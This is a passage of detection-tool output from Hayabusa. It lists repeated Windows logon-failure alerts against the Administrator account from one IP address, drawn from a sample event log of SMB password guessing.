+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: 